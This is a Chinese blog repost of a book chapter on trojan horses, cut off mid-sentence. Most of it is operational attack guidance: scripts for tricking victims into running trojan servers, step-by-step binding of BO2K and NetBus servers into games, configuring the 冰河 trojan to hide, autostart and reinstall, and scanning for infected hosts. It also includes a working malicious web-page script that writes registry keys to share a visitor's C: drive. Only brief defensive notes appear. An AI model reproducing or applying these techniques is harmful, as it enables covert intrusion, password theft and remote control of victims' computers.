深度剖析木马的植入与攻击

深度剖析木马的植入与攻击安全问题2010-09-1813:57:43阅读54评论0字号：大中小订阅为了学习转的：第3章深度剖析木马的植入与攻击•木马是如何实施攻击的•木马的植入与隐藏•木马信息反馈•常用木马例说•木马的清除和防范木马，也称特伊洛木马，英文名称为Trojan。其本身就是为了入侵个人电脑而开发的，藏在电脑中和工作的时候是很隐蔽的，它的运行和黑客的入侵不会在电脑的屏幕上显示出任何痕迹。Windows本身没有监视网络的软件，所以不借助其它工具软件，许多时候是很难知道木马的存在和黑客的入侵的。由于很多新手对安全问题了解不多，所以并不知道自己的计算机中了“木马”该如何清除。虽然现在市面上有很多新版杀毒软件都可以自动清除“木马”，但它们并不能防范新出现的“木马”程序，因此最关键的还是要知道“木马”的工作原理，这样就会很容易发现自己是否中“木马”了。3-1木马是如何实施攻击的木马是黑客最常用的攻击方法，因此，在本章中将使用较大篇幅来介绍木马的攻防技术。木马的危害性在于它对电脑系统强大的控制和破坏能力、窃取密码、控制系统操作、进行文件操作等，一台计算机一旦被一个功能强大的木马植入，攻击者就可以像操作自己的计算机一样控制这台计算机，甚至可以远程监控这台计算机上的所有操作。尽管资深的黑客是不屑于使用木马的，但在对网络安全事件的分析统计里，却发现有相当部分的网络入侵是通过木马来进行的，包括2002年微软被黑一案，据说就是通过一种普通的蠕虫木马侵入微软的系统，并且窃取了微软部分产品源代码的。3-1-1木马是如何侵入系统的小博士，你好！可以给我讲一下木马是如何侵入系统的吗？没问题，一般的木马都有客户端和服务器端两个执行程序，其中客户端用于攻击者远程控制植入木马的计算机，服务器端程序就是通常所说的木马程序。攻击者要通过木马攻击计算机系统，他所做的第一步就是要把木马的服务器端程序植入到被攻击的计算机里面。目前木马入侵的主要途径，还是先通过一定的方法把木马执行档案弄到被攻击者的计算机系统里，如浏览网页、收看邮件、下载信息时，通过一定的提示故意误导被攻击者打开执行档案，比如故意谎称这是个木马执行档案是朋友送给自己贺卡，可能在打开这个档案后，确实有贺卡的画面出现，但这时木马却已经悄悄在自己的后台执行了。一般的木马执行档案非常小，大多都是几K到几十K,如果把木马连接到正常档案上，是很难发现的，所以有一些网站提供的软件下载往往是连接了木马档案的，在执行这些下载的档案时，也同时执行了木马。木马也可以通过Script、ActiveX及ASP、CGI交互脚本的方式植入，由于微软的IE浏览器在执行Script脚本上存在一些漏洞，攻击者可以利用这些漏洞传播病毒和木马，甚至直接对浏览者计算机进行档案操作等控制，前不久就出现一个利用微软Scripts脚本漏洞对浏览者硬盘进行格式化的Html网页。如果攻击者有办法把木马执行档案上传到攻击计算机的一个可执行WWW目录夹里面，他就可以通过编写CGI程序在攻击计算机上执行木马目录。木马还可以利用系统的一些漏洞进行植入，如微软著名的IIS服务器溢出漏洞，通过一个IISHACK攻击程序即可使IIS服务器崩溃，并且同时攻击服务器执行远程木马执行档案。木马在被植入攻击计算机后，它一般会通过一定的方式把入侵计算机的信息发送给攻击者（如计算机的IP地址、木马植入的端口等），这样攻击者有这些信息才能够与木马里应外合，控制攻击计算机。早期的木马大多都是通过发送电子邮件的方式把入侵信息告诉攻击者，有一些木马档案干脆把计算机所有的密码用邮件的形式通知给攻击者，这样攻击时就不用直接连接被攻击计算机即可获得一些重要数据，如攻击QQ密码的GOP木马即是如此。使用电子邮件的方式对攻击者来说并不是最好的一种选择，因为如果木马被发现，则可能通过这个电子邮件的地址找出攻击者。现在还有一些木马采用的是通过发送UDP或者ICMP数据包的方式通知攻击者。由于任何木马都有一个服务端程序，要对一台目标机进行远程控制都必须将服务端程序送入目标机，并诱骗目标机执行该程序。这是用木马进行远程控制中的重要一步，也是很有技巧的一步。3-1-2木马是如何实施攻击的木马可以以任何形式出现，可能是任何由用户或客户引入到系统中的程序。其提供或隐藏了一些功能，这些功能可以泄漏一些系统的私有信息或者控制该系统，这样，它实际上就潜伏着很大的危险性。通常木马采取六个步骤实施攻击。配置木马（伪装木马）一传播木马（通过E-mail或者下载）一运行木马（自动安装、自启动）一信息泄漏（通过E-mail、IRC或QQ的方式使自己的信息泄露出去）一建立连接一远程控制，如图3-1所示。图3-1木马攻击的步骤至此，木马就彻底掌握了主动权，而你，就坐以待毙吧！3-1-3木马可以造成什么危害鉴于木马严重的危害，很多人对木马知识还是有一定了解的，这对木马的传播起了一定的抑制作用，这是木马设计者所不愿见到的，因此他们开发了多种功能来伪装木马，以达到降低用户警觉，欺骗用户的目的。1.修改图标当在E-MAIL的附件中看到这个图标时，是否会认为这是个文本文件呢？但在这里不得不告诉大家，这也有可能是个木马程序。现在已经有木马可以将木马服务端程序的图标改成HTML、TXT、ZIP等各种文件的图标，这有相当大的迷惑性。不过目前提供这种功能的木马还不多见，并且这种伪装也不是无懈可击的，所以不必整天提心吊胆、疑神疑鬼。捆绑文件这种伪装手段是将木马捆绑到一个安装程序上，当安装程序运行时，木马在用户毫无察觉的情况下，偷偷的进入了系统。至于被捆绑的文件一般是可执行文件(即EXE、COM一类的文件)。出错显示有一定木马知识的人都知道：如果打开一个文件没有任何反应，这很可能就是个木马程序。木马的设计者也意识到了这个缺陷，所以已经有木马提供了一个叫做出错显示的功能。当服务端用户打开木马程序时，会弹出一个错误提示框(这当然是假的)，错误内容可自由定义，大多会定制成一些诸如“文件已破坏，无法打开的！”之类的信息，当服务端用户信以为真时，木马却悄悄侵入了系统。定制端口很多老式的木马端口都是固定的，这给判断是否感染木马带来了方便，只要查一下特定的端口就知道感染了什么木马。所以现在很多新式的木马都加入了定制端口的功能，控制端用户可以在1024〜65535之间任选一个端口作为木马端口(一般不选1024以下的端口)，这样就给判断所感染木马类型带来了麻烦。自我销毁这项功能是为了弥补木马的一个缺陷。由于当服务端用户打开含有木马的文件后，木马会将自己拷贝到Windows的系统文件夹中(一般位于C：\windows\system(Windows9X)或C：\WINNT\system32(WindowsNT/2000)目录下)，一般来说原木马文件和系统文件夹中的木马文件的大小是一样的(捆绑文件的木马除外)那么中了木马的朋友只要在近来收到的信件和下载的软件中找到原木马文件，再根据原木马的大小去系统文件夹中查找相同大小的文件，判断一下哪个是木马就行了。而木马的自我销毁功能是指安装完木马后，原木马文件将自动销毁，这样服务端用户就很难找到木马的来源，在没有查杀木马工具的帮助下，就很难删除木马了。木马重命名安装到系统文件夹中的木马文件名一般是固定的，那么只要根据一些查杀木马的文章，按图索骥在系统文件夹查找特定的文件，就可以断定中了什么木马。所以，现在有很多木马都允许控制端用户自由定制安装后的木马文件名，这样就很难判断所感染的木马类型了。3-1-4网页木马制作例说会使木马的人有成千上万，但是有很多人却不明白应该怎么把木马植入到对方的电脑，随着计算机的普及，在网络上相信很少有人会再轻易地接收对方的文件了，所以网页木马就诞生了。其实网页木马应该算是HTML带动同路径下一个exe文件的主页，也就是当浏览器浏览这个页面的时候，一个exe的文件就在后台自动下载并执行了。可以做一个test.html的文件在桌面上，内容如下：再在桌面上随便找个exe文件，名字一定要改为tset.exe，好了，这时双击刚才生成的HTML文件，当看到“网页加载中，请稍候……”时，就可以看到那个同路径下的exe文件也被无条件执行了，这种页面的优点就是编译修改简单，但在申请下了一个个人主页空间，并且把这两个文件上传上去，当试图通过浏览器浏览自己杰作的时候，IE的安全警告就会跳出来，大约是没有几个人愿意乖乖冒着风险去单击【是】按钮的吧！好了，不管这个网页木马在本地是多么的完美，但是放到了网上就通不过IE的安全策略了，这个小马只好宣告失败。还有就是通过IE自身的漏洞写入注册表，相信很多人经常在浏览一些主页的时候，注册表被改的乱七八糟、IE标题被改、首页被改、注册表编辑器被禁用等，这些都是自动修改了用户注册表网页的杰作。所以，也可以做个页面让浏览者的硬盘完全共享，也是做个HTML文件，具体内容如下：scriptlanguage=javascript>document.write("");functionf(){a1=document.applets[0];a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");a1.createInstance();Shl=a1.GetObject();Shl.RegWrite("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Network\\LanMan\\RWC$\\Flags",402,"REG_DWORD");Shl.RegWrite("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Network\\LanMan\\RWC$\\Type",0,"REG_DWORD");Shl.RegWrite("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Network\\LanMan\\RWC$\\Path","C:\\");}functioninit(){setTimeout("f()",1000);}init();当对方在浏览过这个页面的时候，他的C:就被共享了，共享后的进入方法就不用说了，但虽然被共享了，却还不知道谁正在看自己的这个页面，他的IP又是多少，没有关系，有个很简单的方法，去163申请一个域名的转换，如,然后连接到目标地址里就可以了。这种网页木马的特点是比较安全，并且还不易被对方发现，但是操作起来却比较麻烦，需要牵扯到很多的东西。3-2木马的植入与隐藏在Windows系统下，木马可以通过注册表、Win.ini、system.ini、Autoexec.bat和Config.sys、捆绑替换系统文件、启动菜单及程序配置ini文件来自我启动运行。Win.ini：[WINDOWS]下面，"run="和"load=‘'行是Windows启动时要自动加载运行的程序项目；System.ini：[BOOT[下面有个''shell=Explorer.exe'选项。正确的表述方法就是这样。如果等号后面不仅仅是Explorer.exe，而是"shell=Explorer.exe程序名"，那么后面跟着的那个程序就是木马程序；注册表：在HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion下面五个以Run开头的主键目录都是系统自启的键值。当然，还可以通过木马程序一般都是和其他正常的程序捆绑在一起的特性，来侵入别人的主机。例如把特洛伊木马程序合成在小游戏程序中，当受攻击者下载这个小游戏并将其执行时，木马程序就会在后台悄悄地工作，从而侵入受攻击者的主机。那这样一来，用户的主机岂不是很危险吗？尽管如此，在黑客横行的网络世界中，这也是没有办法的事。唯一能够做的就是尽力维护好自己的系统，安装或升级到最新版的防火墙，了解最前沿的病毒与木马资讯，做好一切防范措施。下面介绍几种常见的伪装植入的方法。1．直接发送式欺骗将木马服务端程序直接发给对方，对方运行后，结果毫无反应(运行木马后的典型表现，)对方说：“怎么打不开呀!”回答：“哎呀，不会程序是坏了吧?”或者说：“对不起，我发错了!”然后把正确的东西(正常游戏、图片等)发给对方，他收到后只顾高兴就不想刚才为什么会出现那种情况了。2．捆绑欺骗把木马服务端和某个游戏或工具捆绑成一个文件在QQ或邮件中发给别人，别人运行后它们往往躲藏在Windows的系统目录下，图标伪装成一个文本文件或者网页文件，通过端口与外界进行联系。然后把自己和一些EXE文件捆绑在一起，或者采用改变文件关联方式的方法，来达到自动启动的目的。而且，即使以后系统重装了，如果该程序还保存着，就还有可能再次中招。3．文件夹惯性点击把木马文件伪装成文件夹图标后，放在一个文件夹中，然后在外面再套三四个空文件夹，很多人出于连续点击的习惯，点到那个伪装成文件夹木马时，也会收不住鼠标点下去，这样木马就成功运行了。4．危险下载点攻破一些下载站点后，下载几个下载量大的软件，捆绑上木马，再悄悄放回去让别人下载，这样以后每增加一次下载次数，就等于多了一台中木马的计算机。或者把木马捆绑到其他软件上，然后“正大光明”地发布到各大软件下载网站，它们也不查毒，就算查也查不出一些新木马。5．邮件冒名欺骗该类木马植入的前提是，用匿名邮件工具冒充好友或大型网站、机构单位向别人发木马附件，别人下载附件并运行的话，就中木马了。6．QQ冒名欺骗该类木马植入的前提是，必须先拥有一个不属于自己的QQ号。然后使用这个QQ号码给好友们发去木马程序，由于信任被盗号码的主人，好友们会毫不犹豫地运行木马程序，结果就中招了。7.ZIP伪装将一个木马和一个损坏的ZIP包(可自制)捆绑在一起，然后指定捆绑后的文件为ZIP图标，这样一来，除非别人看了他的后缀，否则单击下去将和一般损坏的ZIP没什么两样，根本不知道其实已经有木马在悄悄运行了。ZIP伪装的常见做法如下：首先创建一个文本文档，输入任意个字节(其实一个就行，最小)将它的扩展名xt直接改为zip即可，然后把它和木马程序捆绑在一起，修改捆绑后的文件图标为zip图标就可以了。下面就来主要介绍一下如何把木马程序和其他程序捆绑起来。3-2-1利用合成工具Exebinder伪装木马利用Exebinder软件可以把两个可执行程序捆绑成一个程序，执行捆绑后的程序就等于同时执行了两个程序。而且它会自动更改图标，使捆绑后的程序和捆绑前的程序图标一样，做到天衣无缝，并且还可以自动删除运行时导出的程序文件。这样就可以把自己的程序和其它软件捆绑起来，使其悄悄地在后台运行。该软件的使用方法如下：运行软件后，单击【可执行文件1】按钮，选择一个程序(如C:\PWIN98\NOTEPAD.exe)，如图3-2所示；单击【可执行文件2】按钮，选择另一个程序（如某远程控制软件的服务端程序D:\updatev3b6d40.exe）,如图3-3所示；再单击【目标文件】为捆绑好的文件选择一个路径及文件名（如D:\Notepad.exe），如图3-4所示，最后直接单击【捆绑】按钮，即可完成捆绑操作了。之后就可以看到捆绑后的文件，运行D:\Notepad.exe即等于同时运行C:\PWin98\Notepad.exe与D:\Server.exe两个程序。图3-2选择一个程序图3-3选择另一个程序图3-4完成捆绑操作特别提示：应该把被捆绑的程序指定为“执行文件1”，把想捆绑上的程序指定为“执行文件2”，把捆绑后生成的文件指定为“目标文件”。软件会自动提取“执行文件1”的图标，使“目标文件”的图标与“执行文件”的图标一样，做到天衣无缝。建议将“目标文件”的文件名指定为与“执行文件1”相同，更加具有隐蔽性。“执行文件1”、“执行文件2”、“目标文件”三个文件必须指定为三个不同的文件，也就是说“目标文件”不能直接指定为“执行文件1”，软件不能直接对“可执行文件1”进行覆盖。3-2-2用合成工具ExeJoine伪装木马黑客最常用的是一个名为“ExeJoiner”的程序，它可以将两个exe文件合并，之后如果一执行这个“混合体”，便会同时执行合拼的两个程序。因为NetBus的服务器程序在执行后是没有反应的，所以对方只会以为是执行了另一个普通的程序！简便易行的使用界面让黑客们趋之若鹜，而绝大多数防毒软件还未把它列为病毒，exejoiner可以用来掩饰安装木马的行为，是一件相当危险的黑客工具！！！该文件合成工具ExeJoiner由两个文件组成：ExeJoiner.exe和pilot.dat，但ExeJoiner工具的两个文件是缺一不可的，当把pilot.dat删除的时候，执行ExeJoiner的合成功能时，程序会提示pilot.dat缺少。用文件合成工具ExeJoiner伪装木马的方法如下：打开ExeJoiner工具，就会出现它的主操作界面。在【Exe1path】中单击【Browse】按钮，找出想合拼的文件（例如NetBus的服务器端程序）。或在【Exe2path】中单击【Browse】按钮，找出想合拼的文件（例如一些小玩意的程序）。在这里单击第一个【Browse】按钮，打开文件选择对话框。在文件选择对话框中选择小游戏程序，单击【打开】按钮，ExeJoiner会给出提示表明第一个可执行文件选择成功。用同样的方法，单击第二个【Browse】按钮，选择要合成的第二个可执行文件，这里选择木马Back0rifice2000服务器端的程序，文件名为BO2K.EXE。选中要合成的两个文件之后，单击ExeJoiner工具界面上的［JOIN］按钮，如果成功合成，则会出现合并提示对话框。这时就可以在ExeJoiner工具所在的文件夹中看到合成后的可执行文件patched.exe了，该可执行文件合成了一个小游戏程序和Back0rifice2000的服务器端程序。由于特洛伊木马执行时是没有任何反应的，而防毒软件又不能把它检测出来，所以对方只会以为执行了一普通的程序，中标也就难免了。据说目前还没有有效的防御方法可以对付它，因此，只有提醒读者注意平时不要打开来历不明的邮件，不要执行可疑的文件，防患于未然。3-2-3利用万能文件捆绑器伪装木马万能文件捆绑器可以将多个不同类型（如把a.exe和b.jpg）的文件捆绑成一个可执行文件，运行捆绑后的程序会以当前系统默认的打开方式打开。并且可以自定义哪个捆绑的文件不打开只释放（如b.exe必须要b.dll这个文件才能运行，那么可以先增加b.dll，再增加b.exe，让b.dll不打开，这样捆绑后就成了一个程序了，且能正常运行）；同时可以自定捆绑后程序的图标。万能文件捆绑器的操作界面如图3-5所示。图3-5万能文件捆绑器的操作界面如果单击【增加文件】按钮即可增加要捆绑的文件，然后单击【捆绑文件】按钮将选定的几个文件捆绑成一个程序，这时出现一个保存对话框，生成的文件扩展名可以是.exe、.com、.bat三种类型的文件，如图3-6所示，用户可以根据自己的需要设置保存时的文件名和保存路径，最后点击【保存】按钮即可生成。图3-6【保存捆绑文件】对话框当然了，在单击【捆绑文件】按钮之前，用户还可以点击【选择图标】按钮，为自己的捆绑文件指定喜爱的图标。如果在如图3-5所示中取消“要捆绑的文件”中“打开”前面的“丿”，即可将该文件设置为只释放不打开状态。3-2-4利用合成工具Joine伪装木马另外的一个合成工具Joine也是由两个文件组成，其中Joiner.exe为该工具的主程序，而Readme.txt则是其说明文件。使用文件合成工具Joine伪装木马的方法如下：需要先双击主程序Joiner.exe，打开主界面。在Joiner工具界面的【Firstexecutable］文本框中，输入某个小游戏程序的路径和程序名称。或者单击文本框右边的文件夹图标，打开【选择文件】对话框，在该对话框中，选择小游戏程序。在【Secondfile】下面的文本框中，填入木马程序的路径和程序名称，同样，也可以单击文本框右边的文件夹图标，在【打开】对话框中选择木马程序。这时再单击Joiner工具界面的【Join】按钮，程序合并的任务就完成了，这时在Joiner所在的文件夹中就会出现一个result.exe文件，该文件就是由小游戏程序和木马程序合并的新程序，因此可以看到，它的大小比合并前的两个文件中的任何一个都要大。3-2-5利用网页木马生成器伪装木马有些黑客喜欢在自己制作的网页上捆绑木马，然后将其上传到网站上，接着到一些论坛或是QQ上大肆宣传自己的网页，诱惑用户去访问。只要用户访问了这个捆绑了木马的网页，自己就被种上了木马了。网页木马生成器的使用非常简单，只要选择一个木马文件和一个网页文件就可以进行生成了，如图3-7所示。具体需要填写的步骤如下：打开2004html.exe在第一个栏里填上：http://你的网址/木马文件名。在第二栏里填上：http://你的网址/木马文件名.js。在第三栏里填上木马文件的大小（这里是按照字节计算大小的，用鼠标在木马文件上按右键点属性就可以看到木马文件的字节了，在填的时候不要加，号。单击【生成】按钮之后，就会生成两个文件：一个JS文件这个不可以重命名，一个newtimes.htm文件，这个可以重命名。然后把生成的两个文件连同自己的木马文件一起上传到自己的空间就可以了。当用户点击这个捆绑了木马的网页链接（如网上的一个RAR文件）时，将会同时弹出一个文件下载的对话框，如图3-8所示，如果点击【打开】按钮，将会直接运行木马程序，如果点击【保仔】按钮，保存在某个文件夹后，当用户好奇地以为是什么好东东而点击【打开】按钮时，木马程序也一样会被植入其计算机中。对于不可信的文件下载，千万不能直接点击【打开】按钮，如果你对此很好奇，可以先保存到本地后，用杀毒软件和木马清除软件扫描无毒后，再打开。这种方法是利用IE的MIME漏洞，这是2001年黑客中最流行的手法，不过目前有所减少，一方面许多人都改用IE6.0（未打补丁的IE6.0以前版本都存在MIME漏洞）；另一方面，大部分个人主页空间都不允许上传.eml文件了。图3-7网页木马生成器运行主界面图3-8【文件下载】对话框MIME（MultipurposeInternetMailExtentions），一般译作"多用途的网络邮件扩充协议"。是一种技术规范，原用于电子邮件，现在也可以用于浏览器。使用此协议后，IE可以直接播放网页中所包含的声音、动画等，如果木马伪装成这类文件，就可以让浏览者在不知不觉中种上黑客的木马。3-2-6如何隐藏自己的木马服务器程序在前面讲过，木马程序的名字通常都与Windows的系统文件名相似，而且通常都隐藏在System32或者Windows目录下，这样做主要是为了迷惑别攻击者。隐藏木马服务器程序最常用的方法就是对其客户端程序进行设置和修改，从而得到隐藏的目的。下面就以冰河为例来对其进行一下说明，具体操作步骤如下：运行“冰河”客户端程序G_Client.exe将弹出如图3-9所示的冰河V8.4操作界面。单击其工具条上的【配置本地服务器程序】按钮，如图3-10所示。图3-9【冰河V8.4版】窗口图3-10【工具栏】的一部分这时就可以看到会弹出一个如图3-11所示的【服务器配置】对话框。选择其中的【待配置文件】，只要单击其后面的【...】按钮，将会弹出如图3-12所示的【打开】对话框。选择待配置文件G_Server.exe后，单击【打开】按钮就可以隐藏木马程序了。图3-11【服务器配置】对话框图3-12【打开】对话框【基本设置】选项卡选项说明如下。•【安装路径】：可以从【SYSTEM】、【WINDOWS】、【TEMP】三个选项中选择其中的一个，从这里就可以看出“冰河”的隐身地只有这么几处。•【文件名称】：在这里可以更改为任意名字，从这里可以看出木马服务器程序的名称不是固定的。•【进程名称】：变成Windows系统进程主要是为了迷惑被攻击者。•【访问口令】：如果还没有创建这个访问口令是不能与木马服务器程序通讯的。•【自动删除安装文件】：选中该复选框，则在运行G_Server.exe之后，该文件将被自动删除。这里顺便提醒大家一下：并不是所有中了“冰河”的计算机都有G_Server.exe存在与对方的计算机中，因此许多时候，利用【开始】一【查找】菜单命令根本就不能找到它。【自我保护】选项卡•【自我保护】选项卡的主界面如图3-13所示，在该窗口中，主要包括以下几项：•【写入注册表/启动项】：只要选中了该复选框，则目标计算机以后每次重新启动的时候都将会自动运行木马服务器程序。图3-13【自我保护】选项卡•【键名】：在这里可以输入任意键名。从这里可以看到写入注册表的键名不是固定的，但是目录却是固定的，即：HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\sun。•【关联】：只要选中了该复选框，以后即使木马服务器程序被删除了，如果对方运行了Notepad.exe（记事本程序），它就又会重新安装“冰河”服务器程序了。•【关联类型】：选择关联文件类型。•【关联文件名】：选择关联的程序，如Notepad.exe。通过以上的叙述，可以看到“冰河”服务器程序的隐蔽性并不是很高明，因此只要知道了它常用的隐藏方法，想找到它还是很容易的，清除起来自然也就不难了。其他木马程序的隐藏方式与“冰河”类似，有兴趣的话，大家不妨自己查查看。下面再来介绍黑客使用的另一种隐藏方法，其实就是把木马服务器程序G_Server.exe同其他程序绑定在一起。因为木马程序运行时在桌面不会有任何明显的反应，因此在运行绑定程序时，看到的只是另一个程序的运行情况。绑定两个程序的具体操作步骤如下：确定将被绑定的两个程序，一个是木马的服务器程序G_Server.exe,另一个为合法程序，如记事本程序，如图3-14所示。图3-14确定要绑定的程序再运行Exebinder文件捆绑机程序，将弹出【EXE捆绑机1.5版】窗口，如图3-15所示。选择两个将要绑定的程序、图标和生成文件，在选择好之后，就可以直接单击【捆绑】按钮来完成绑定了，捆绑完成后的结果如图3-16所示。图3-15【EXE捆绑机】窗口图3-16捆绑后的文件3-2-7木马程序的启动与发现在Windows系统下，木马可以通过注册表、Win.ini、System.ini、Autoexec.bat和Config.sys、连接替换系统档案、启动菜单及程序配置ini档案来自我启动执行。Win.ini：[WINDOWS]下面，"run="和"load="行是Windows启动时要自动加载执行的程序项目System.ini：[BOOT[下面有个''shell=Explorer.exe'项。正确的表述方法就是这样。如果等号后面不仅仅是explorer.exe，而是"she归Explorer.exe程序名"，那么后面跟着的那个程序就是木马程序。注册表：在KEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion下面五个以Run开头的主键目录都是系统自主启动的关键数值。对于一些常见的木马，如SUB7、B02000、冰河等，它们都是采用打开TCP端口监听和写入注册表启动等方式，使用Clean之类的软件可以检测到这些木马，最新版天网个人防火墙也提供强大的木马检测和清除功能。这些检测木马的软件大多都是利用检测TCP连结、注册表等信息来判断是否有木马入侵，这也可以通过手工来探测。如果发现自己的硬盘老没缘由的读取，软盘灯经常自己亮起，网络连接及鼠标、屏幕出现异常现象，很可能就是因为有木马潜伏在了自己的计算机里面。这时最简单的方法就是使用netstat命令查看：ProtoLocalAddressForeignAddressStateTCPdddd-gam68abjr9:166200:httpESTABLISHETCPdddd-gam68abjr9:1694TCE-E-7-182-210.:httpTCPdddd-gam68abjr9:170200:httpESTABLISHETCPdddd-gam68abjr9:182358:httpCLOSE_WAITTCPdddd-gam68abjr9:182458:httpCLOSE_WAIT从左到右依次是连接类型、本地连接地址端口、远程连接地址端口、连接状态，可以通过这个命令发现所有网络连接，如果这是有攻击者通过木马连接，则可以通过这些信息发现异状。通过端口扫描的方法也可以发现一些弱智的木马，特别是一些早期的木马，它们连接的端口不能更改的，通过扫描这些固定的端口也可以发现木马是否被植入。还可以通过手工检测上文所述的和木马启动的系统档案以及注册表的方式，把那些不明白的自行启动执行档案清除掉。如果在发生系统异常后，最好将网络线断离再诊断木马。3-3木马信息反馈所谓木马配置程序将就信息反馈的方式或地址进行设置，如设置信息反馈的邮件地址＞IRC号、QQ号等。一般来说，所有设计成熟的木马都有一个信息反馈机制。所谓信息反馈机制是指木马成功安装后会收集一些服务端的软硬件信息，并通过E-mail、IRC或QQ的方式告知控制端用户，如图3-17所示就是一个典型的信息反馈邮件。从如图3-17所示的这封邮件中可以知道服务端的一些软硬件信息，包括使用的操作系统、系统目录、硬盘分区情况、系统口令等，在这些信息中，最重要的是服务端IP,因为只有得到这个参数，才能使控制端与服务端建立连接。服务端用户运行木马或捆绑木马的程序后，木马就会自动进行安装。首先将自身复制到Windows的系统文件夹中(一般位于C：\windows\system(Windows9X)或C：\WINNT\system32(WindowsNT/2000)目录下)，然后在注册表，启动组，非启动组中设置好木马的触发条件，这样木马的安装就完成了，安装后就可以启动该木马了。当木马被激活后，就会进入内存，并开启事先定义的木马端口，准备与控制端建立连接。这时服务端用户可以在MS-DOS方式下，键入NETSTAT-AN查看端口状态，一般个人电脑在脱机状态下是不会有端口开放的，如果有端口开放，就要注意是否感染木马了。下面来介绍一下木马连接是如何建立的，一个木马连接的建立首先必须满足两个条件：是控制端、服务端都要在线；是服务端已安装了木马程序。这两个条件缺一不可，在这个基础上控制端就可以通过木马端口与服务端建立连接了。为便于说明这里采用如图3-18所示的方式来对其加以讲解。在如图3-18所示中A机为控制端，B机为服务端，对A机来说如果想与B机建立连接就必须知道B机的木马端口和IP地址，这时候，由于A机事先设定了木马端口，因此该项是已知项，所以这里最重要的是如何获得B机的IP地址。要想获得B机的IP地址可以采用信息反馈和IP扫描两种方法。图3-17一个典型的信息反馈邮件图3-18建立连接这里再重点介绍一下IP扫描技术：因为B机装有木马程序，所以它的木马端口7626是处于开放状态的，现在A机只要扫描IP地址段中7626端口开放的主机就行了，如图3-18所示B机的IP地址是6，当A机扫描到这个IP时发现它的7626端口是开放的，那么这个IP就会被添加到列表中，这时A机就可以通过木马的控制端程序向B机发出连接信号，B机中的木马程序收到信号后立即作出响应，当A机收到响应的信号后，开启一个随即端口1037与B机的木马端口7626建立连接，到这时一个木马连接才算真正建立。值得一提的是：要扫描整个IP地段显然费时费力，一般来说控制端都是先通过信息反馈获得服务端的IP地址，由于拨号上网的IP是动态的，即用户每次上网的IP都是不同的，但是这个IP是在一定范围内变动的，如图3-3-2所示中B机的IP是6，那么B机上网IP的变动范围是在202.102.000.000〜55，所以每次控制端只要搜索这个IP地址段就可以找到B机了。木马连接建立后，在控制端端口和木马端口之间就将会出现一条通道，如图3-19所示。这时候，控制端上的控制端程序就可以借着这条通道与服务端上的木马程序取得联系，并通过木马程序对服务端进行远程控制了。图3-19控制端端口和木马端口之间将会出现一条通道小博士，你好，虽然这时候取得了对该服务端的远程控制权限，但我却不知道自己具体都能够想有哪些控制权限？你可以给我介绍一下吗？好的，其实这时候你所拥有的控制权限，远比想象的要大得多。控制端具体能享有的控制权限如下：窃取密码一切以明文的形式或缓存在Cache中的密码都能被木马侦测到，此外很多木马还提供有击键记录功能，它能够记录服务端每次敲击键盘的动作，所以一旦有木马入侵，密码将很容易被窃取。文件操作控制端可通过远程控制对服务端上的文件进行删除、新建、修改、上传、下载、运行、更改属性等一系列操作，基本涵盖了Windows平台上所有的文件操作功能。修改注册表控制端可任意修改服务端注册表，包括删除、新建或修改主键、子健、键值。有了这项功能，控制端就可以禁止服务端软驱，光驱的使用，锁住服务端的注册表，将服务端上木马的触发条件设置得更隐蔽的一系列高级操作。系统操作这项内容包括重启或关闭服务端操作系统，断开服务端网络连接，控制服务端的鼠标、键盘，监视服务端桌面操作，查看服务端进程等，控制端甚至可以随时给服务端发送信息。3-3-1扫描装有木马程序的计算机要想实现木马信息的反馈，就需要在安装完木马服务器程序之后，利用该木马的客户端程序来访问目标计算机，以取得被攻击者的各种信息数据。在访问木马服务器程序之前，一般都要先进行搜索。下面仍然以“冰河”为例，来对如何访问目标计算机进行一些说明。具体操作步骤如下：运行“冰河”客户端程序G_Client.exe。单击按钮或选择【文件】一【自动搜索】命令，这时就可以看到弹出的【搜索计算机】窗口，如图3-20所示。在输入好【起始域】、【起始地址】以及【终止地址】后，单击【开始搜索】按钮，“冰河”就开始搜索（扫描）指定网段中所有7626端口开放的计算机了，如图3-21所示。完成搜索后，就可看到如图3-22所示在【搜索结果】列表框中显示的搜索结果了。图3-20【搜索计算机】窗口图3-21开始搜索图3-22搜索结果在该【搜索结果】列表框中，ERR表示其对应的计算机没有开放7626端口，OK表示其对应的计算机开放了7626端口。所以，在如图3-22所示的对话框中，就可以知道IP地址为6的计算机中了“冰河”。同时中了“冰河”的计算机的IP将自动被添加到“冰河”客户端程序的【文件管理器】选项卡中，这样，就可以对其进行操作了。3-3-2执行者4.3的木马安装配置其实木马传播的方式很简单，用户可以通过QQ、邮件或干脆在别人的电脑上直接下载木马文件并执行木成文件。当然了，最后一种方式既不乐观也不实际，那通过其他方式总不能直接把木马程序传给对方，让对方直接运行吧？所以一种很实用也很便捷的木马传播方式：网页木马自然就派上用场了，有了网页木马程序，只要对方浏览了该网页地址，对方的电脑就可能会自动下载了木马并且自动在后台运行起来。这里给大家介绍一款由陈经韬先生制作的exe2bmp.exe（执行着）木马，可通过进入黑白网络或者小凤居下载专区进行下载，也可以通过其官方网址：/DOWNLOAD.ASPX进行下载，下载后保存在“D：\木马配置”目录如图3-23所示。大家千万不要以为该图下载的程序就是所谓的木马，这只是木马的配置程序。（请注意区分程序图标为文本文件图标）下载配置程序后，就是配置程序了，如果自己是“执行者”的会员的话，那就可以直接进入配置那一步了，如果是还没有来得及注册，那就需要登陆其网站进行会员注册，并且执行者的版本升级是全免费、永远性的、支持自动升级。所以新老会员不用考虑收费的问题，请放心大胆的使用吧。如果已经注册了，那就直接去看具体的配置，如图3-24所示，在网站页面的登陆框下有一排链接，点选会员注册，进入服务条款声明页面，点选【我同意】即可进入注册资料填写，在配置木马时将用上的密码和确认密码都填一个相同的密码。譬如用户名填:test001密码填：001test信箱需真实填写，以后如果忘记密码就全靠它了，如图3-25所示。单击【确定】后，如系统提示注册成功，则表示已经成功的注册成为执行者会员了。接下来就可以开始进入配置木马这一项了。如果系统出错，那就检查一下自己的填写是否有错，当然如果系统繁忙，就等等再试试！注册好了会员，就看下一步如何配置木马程序了！执行如图3-23所示的配置程序，也就是大家从网站上下载下来的那个文件其实配置很简单，